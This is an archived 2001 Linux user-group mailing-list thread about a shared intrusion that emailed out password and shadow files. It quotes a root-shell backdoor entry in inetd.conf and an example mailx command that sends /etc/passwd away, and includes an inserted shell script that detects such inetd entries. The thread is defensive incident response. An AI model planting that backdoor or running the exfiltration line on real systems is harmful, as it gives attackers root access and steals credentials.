RE: [SLUG] Security Breach

2001-02-28 Thread Sean Carmody

> This occurred to me as well last night - I think around 3am. Similarly, it
> was discovered because the mail destination domain could not be found.
> However, I think this is because somewhere in the process of getting in,
> they broke my local named (I wasn't working in the morning) - that or
> somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
> errors". The email contained the output of ifconfig and the contents of
> /etc/passwd and /etc/shadow.

My local named seemed ok. Contents of my email exactly as you describe.

> The ISP I was on was Telstra bigpond - if its the same, maybe they were
> scanning that range of addresses.

I was on ihug.

> The other change I found was the following entry on the end of
> /etc/inetd.conf:
> 1008 stream tcp nowait root /bin/sh sh
>
> which you may want to check for and remove/comment.

That's in mine too! Now commented.

> I am thinking it could have been the BIND exploit coming active, but not
> sure (I haven't upgraded yet, and my listen-on clause was broken -
> now fixed not to listen outside).
>
> The fact that they edited /etc/inetd.conf and cat-d shadow indicates root
> privileges. However, there doesn't seem to be any evidence of things inside
> or other changes, so possibly a buffer of exploit type deal?
>
> I run RH6.2 btw :)

So do I.

> The only services i had running out of inetd were ftp, telnet and auth
> (first 2 are shut down until i get home to tighten things) - not portmap.
>
> Makes you wonder if one should send an edited email with prepared IP and
> ready a box to trace what happens :)

Was your email also addressed to [EMAIL PROTECTED]?


-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://slug.org.au/lists/listinfo/slug



Re: [SLUG] Security Breach

2001-02-28 Thread Martin

> I also tried to apply some "tight" ipchains rules but that
> seemed to stuff up pretty much everything so it's back out
> again for now until I work it out properly.

if you have problems getting ipchains rules right, have a look at
pmfirewall...

http://www.pointman.org

it is a script based ipchains ruleset that configures things according
to your answers to a series of questions during installation...

later
marty




Re: [SLUG] Security Breach

2001-02-28 Thread Dave Fitch

On Wed, Feb 28, 2001 at 01:51:08PM +, Simon Bowden wrote:
> However, I think this is because somewhere in the process of getting in,
> they broke my local named (I wasn't working in the morning) - that or
> somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
> errors".

funny you should say that, my named was also dead yesterday
when I got home from work.  I checked over everything, all
the logs, any binaries changed etc etc and couldn't find
anything else at all suspicious.  I was however accidentally
running named on all interfaces so I changed it to just
lo and eth0.  I was also running portmap but stopped it and
everything still seems to work so I guess I don't need it.
And I installed all the relevant security updates from the
debian security site.

I also tried to apply some "tight" ipchains rules but that
seemed to stuff up pretty much everything so it's back out
again for now until I work it out properly.

If I have tcp wrappers controlling everything listening on
all ports (except ssh, apache and postfix), it should be
reasonably secure without ipchains firewalling right?

Dave.




Re: [SLUG] Security Breach

2001-02-28 Thread Scott Howard

On Wed, Feb 28, 2001 at 12:47:18PM +1100, Adrian Chiang wrote:
> Robert Graham's website has some info on port 1024:
> http://www.robertgraham.com/pubs/firewall-seen.html
> 
> quoted below -
> "1024 - Many people ask the question what this port is used for. The
> answer is that this is the first port number in the dynamic range of ports.

This is for outgoing connections, not for incoming, as is the case here.

lsof -i will tell you which process is using a port.

  Scott.




Re: [SLUG] Security Breach

2001-02-27 Thread Howard Lowndes

If it got the contents of /etc/shadow then they got root as that file is
normally only readable by root.  Big worry.

-- 
Howard.

LANNet Computing Associates 
"...well, it worked before _you_ touched it!"   --me
"I trust just one person,
 and there are times when I don't even trust myself"
--me

On Wed, 28 Feb 2001, Simon Bowden wrote:

> Hi,
>
> This occurred to me as well last night - I think around 3am. Similarly, it
> was discovered because the mail destination domain could not be found.
> However, I think this is because somewhere in the process of getting in,
> they broke my local named (I wasn't working in the morning) - that or
> somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
> errors". The email contained the output of ifconfig and the contents of
> /etc/passwd and /etc/shadow.





Re: [SLUG] Security Breach

2001-02-27 Thread Simon Bowden

Hi,

This occurred to me as well last night - I think around 3am. Similarly, it
was discovered because the mail destination domain could not be found.
However, I think this is because somewhere in the process of getting in,
they broke my local named (I wasn't working in the morning) - that or
somewhere upstream someone hurt DNS - I was getting a lot of "Lame server
errors". The email contained the output of ifconfig and the contents of
/etc/passwd and /etc/shadow.

The ISP I was on was Telstra bigpond - if its the same, maybe they were
scanning that range of addresses.

The other change I found was the following entry on the end of
/etc/inetd.conf:
1008 stream tcp nowait root /bin/sh sh

which you may want to check for and remove/comment.
 
I am thinking it could have been the BIND exploit coming active, but not
sure (I haven't upgraded yet, and my listen-on clause was broken - now fixed
not to listen outside).

The fact that they edited /etc/inetd.conf and cat-d shadow indicates root
privileges. However, there doesn't seem to be any evidence of things inside
or other changes, so possibly a buffer of exploit type deal?

I run RH6.2 btw :)
The only services i had running out of inetd were ftp, telnet and auth
(first 2 are shut down until i get home to tighten things) - not portmap.

Makes you wonder if one should send an edited email with prepared IP and
ready a box to trace what happens :)

 - Simon

>Last night I experienced a security breach. I run a small lan with a
>ppp dial-up connection that is often left connected. It seems that at
>11pm an email containing the output of ifconfig and the contents of
>the passwd files was sent by root to [EMAIL PROTECTED] Luckily the mail
>was bounced by our ISP (thanks to the lan's domain name not being found
>by the ISP's DNS).
>Scouring the log files, the only evidence of this breach I can find
>is the log of the attempted mail send in /var/log/maillog and the following
>suspicious entry in /var/log/messages:
>Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
>getport(status): request from unauthorized host
>This is the only portmap log I've ever had.
>Has anyone come across something similar? I've no idea whether this is
>the result of a trojan, or whether someone managed to gain access to
>my machine (although if they did gain root access, why mail out a passwd
>file?). Any thoughts?
>
>Sean.

--
Simon Bowden
Tech Support, School of Economics, UNSW
3rd Year Computer Engineering Student, UNSW
Mobile: 0414 937 375
email: [EMAIL PROTECTED]

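The rogue inetd.conf line Simon found is easy to check for automatically. The script below is an added example, not code from anyone in this thread; it assumes the classic inetd.conf field layout (service, socket type, protocol, wait flag, user, server program, arguments) and runs over a constructed sample file, flagging entries that hand the socket straight to a shell or that bind a root-run server to a bare port number.

```shell
#!/bin/sh
# Added example for the thread above, not code from any poster.
# Assumed inetd.conf layout: service socktype proto waitflag user server-program [args]

# Print one line per suspicious entry in the given inetd.conf.
suspicious_inetd_entries() {
    while read -r svc sock proto waitflag user prog args; do
        # skip blank lines and comments
        case "$svc" in ''|\#*) continue ;; esac
        reason=""
        # a server program that is itself a shell means the client gets a shell
        case "${prog##*/}" in
            sh|bash|csh|ksh|tcsh|zsh) reason="shell as server program" ;;
        esac
        # a purely numeric service field has no /etc/services name;
        # as root that is almost never legitimate
        case "$svc" in
            *[!0-9]*) ;;    # contains a non-digit: an ordinary service name
            *) if [ "$user" = root ]; then
                   reason="${reason:+$reason, }numeric port as root"
               fi ;;
        esac
        if [ -n "$reason" ]; then
            echo "$svc/$proto user=$user prog=$prog $args :: $reason"
        fi
    done < "$1"
}

# Echo how many suspicious entries a file holds (0 when it is clean).
count_suspicious_inetd() {
    suspicious_inetd_entries "$1" | wc -l | tr -d ' '
}

# Constructed sample inetd.conf (not a real system file) for the demo;
# the last line mirrors the entry reported in the thread.
SAMPLE_INETD=$(mktemp)
cat > "$SAMPLE_INETD" <<'EOF'
# sample inetd.conf
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
auth    stream  tcp     nowait  nobody  /usr/sbin/in.identd in.identd -l -e -o
#finger stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
1008    stream  tcp     nowait  root    /bin/sh         sh
EOF

suspicious_inetd_entries "$SAMPLE_INETD"
```

Run it against the real /etc/inetd.conf by passing that path to suspicious_inetd_entries instead of the sample; a wrapped service like in.ftpd via tcpd is not flagged, only direct shells and root-run numeric ports are.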



Re: [SLUG] Security Breach

2001-02-27 Thread kevin

Adrian Chiang wrote:
> 
> Robert Graham's website has some info on port 1024:
> http://www.robertgraham.com/pubs/firewall-seen.html
> 
> quoted below -
> "1024 - Many people ask the question what this port is used for. The
> answer is that this is the first port number in the dynamic range of ports.
> Many applications don't care what port they use for a network connection, so
> they ask the operating system to assign the "next freely available port". In
> point of fact, they ask for port 0, but are assigned one starting with port
> 1024. This means the first application on your system that requests a
> dynamic port will be assigned port 1024. You can test this fact by booting
> your computer, then in one window open a Telnet session, and in another
> window run "netstat -a". You will see that the Telnet application has been
> assigned port 1024 for its end of the connection. As more applications
> request more and more dynamic ports, the operating system will assign
> increasingly higher port numbers. Again, you can watch this effect with
> 'netstat' as you browse the Internet with your web browser, as each
> web-page requires a new connection. "
> 
> not sure about 587...
> 
587 is submission and is used by sendmail.
I will assume you are using RedHat 7.0 as
this is on by default; edit /etc/sendmail.cf
to turn it off if you wish.
-- 
"[EMAIL PROTECTED] kevin"@oceania.net
"Democracy is two wolves and a lamb voting on what to have for lunch. 
Liberty is a well-armed lamb contesting the vote."
~Benjamin Franklin, 1759




Re: [SLUG] Security Breach

2001-02-27 Thread John Clarke

To find out which process is listening on a port, use fuser, e.g.:

[root@dropbear ~]# fuser -n tcp 53
53/tcp:  17479
[root@dropbear ~]# ps ax|grep 17479
17479 ?        S      0:29 named -u named


Cheers,

John
-- 
"Every time I have to pipe something into awk I get this mental picture of a 
big fat seagull with stdin connected at the wrong end."
-- Arthur van der Harg




RE: [SLUG] Security Breach

2001-02-27 Thread Adrian Chiang

Robert Graham's website has some info on port 1024:
http://www.robertgraham.com/pubs/firewall-seen.html

quoted below -
"1024 - Many people ask the question what this port is used for. The
answer is that this is the first port number in the dynamic range of ports.
Many applications don't care what port they use for a network connection, so
they ask the operating system to assign the "next freely available port". In
point of fact, they ask for port 0, but are assigned one starting with port
1024. This means the first application on your system that requests a
dynamic port will be assigned port 1024. You can test this fact by booting
your computer, then in one window open a Telnet session, and in another
window run "netstat -a". You will see that the Telnet application has been
assigned port 1024 for its end of the connection. As more applications
request more and more dynamic ports, the operating system will assign
increasingly higher port numbers. Again, you can watch this effect with
'netstat' as you browse the Internet with your web browser, as each
web-page requires a new connection. "

not sure about 587...

Adrian.


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Bernhard Lüder
Sent: Wednesday, 28 February 2001 12:29 PM
To:
Subject: RE: [SLUG] Security Breach


Hi,

In this context. What is port 587 and 1024. I couldn't find these in
/etc/services


tcp        0      0 0.0.0.0:587             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:1024            0.0.0.0:*               LISTEN

Bernhard Lüder

This electronic mail is solely for the use of the addressee and may contain
information that is confidential or privileged.  If you receive this
electronic mail in error, please delete it from your system immediately and
notify the sender by electronic mail.







RE: [SLUG] Security Breach

2001-02-27 Thread Umar Goldeli

"netstat -ean" will tell you which uid is listening on those ports.

//umar.


On Wed, 28 Feb 2001, [iso-8859-1] Bernhard Lüder wrote:

> Hi,
> 
> In this context. What is port 587 and 1024. I couldn't find these in
> /etc/services
> 
> 
> tcp        0      0 0.0.0.0:587             0.0.0.0:*               LISTEN
> tcp        0      0 0.0.0.0:1024            0.0.0.0:*               LISTEN





RE: [SLUG] Security Breach

2001-02-27 Thread Bernhard Lüder

Hi,

In this context. What is port 587 and 1024. I couldn't find these in
/etc/services


tcp        0      0 0.0.0.0:587             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:1024            0.0.0.0:*               LISTEN

Bernhard Lüder

This electronic mail is solely for the use of the addressee and may contain
information that is confidential or privileged.  If you receive this
electronic mail in error, please delete it from your system immediately and
notify the sender by electronic mail.


-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Umar Goldeli
Sent: Wednesday, February 28, 2001 11:37 AM
To: Sean Carmody
Cc: [EMAIL PROTECTED]
Subject: Re: [SLUG] Security Breach


> Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
> getport(status): request from unauthorized host

Why are you running the portmapper? Turn it off if you don't specifically
need it.

a "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)

If you don't recognize it as something you specifically need - turn it
off. :)

Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p  or similar and your config recognized that he
wasn't allowed.

As above - if you don't need portmap, turn it off.

> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?

Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer overflow with something like
"/bin/mailx < /etc/passwd [EMAIL PROTECTED]" etc.. (or something like
that)..

It could be anything.. either way - you know that something has
happened. Make an executive decision to decide if it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).

If you can, pull the box out of prod and put in a new box while you
examine the compromised one.

//umar.






Re: [SLUG] Security Breach

2001-02-27 Thread Umar Goldeli

> Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
> getport(status): request from unauthorized host

Why are you running the portmapper? Turn it off if you don't specifically
need it.

a "netstat -an | grep LISTEN" will show you "evilthings(tm)" ;)

If you don't recognize it as something you specifically need - turn it
off. :)

Either way, chances are that this is not how they got in - he probably did
an rpcinfo -p  or similar and your config recognized that he
wasn't allowed.

As above - if you don't need portmap, turn it off.

> Has anyone come across something similar? I've no idea whether this is
> the result of a trojan, or whether someone managed to gain access to
> my machine (although if they did gain root access, why mail out a passwd
> file?). Any thoughts?

Remember - root access is generally the *eventual* goal... just because he
got in as userx, doesn't mean he has root, or even a shell for that
matter. It could be as simple as a buffer overflow with something like
"/bin/mailx < /etc/passwd [EMAIL PROTECTED]" etc.. (or something like
that)..

It could be anything.. either way - you know that something has
happened. Make an executive decision to decide if it has (I think it
has) and pull the box from production, rebuild it, secure it, patch it,
then change all user passwords (if any).

If you can, pull the box out of prod and put in a new box while you
examine the compromised one.

//umar.






[SLUG] Security Breach

2001-02-27 Thread Sean Carmody

Last night I experienced a security breach. I run a small lan with a
ppp dial-up connection that is often left connected. It seems that at
11pm an email containing the output of ifconfig and the contents of
the passwd files was sent by root to [EMAIL PROTECTED] Luckily the mail
was bounced by our ISP (thanks to the lan's domain name not being found
by the ISP's DNS).

Scouring the log files, the only evidence of this breach I can find
is the log of the attempted mail send in /var/log/maillog and the following
suspicious entry in /var/log/messages:

Feb 28 01:53:07 emu portmap[12152]: connect from 202.157.133.184 to
getport(status): request from unauthorized host

This is the only portmap log I've ever had.

Has anyone come across something similar? I've no idea whether this is
the result of a trojan, or whether someone managed to gain access to
my machine (although if they did gain root access, why mail out a passwd
file?). Any thoughts?

Sean.

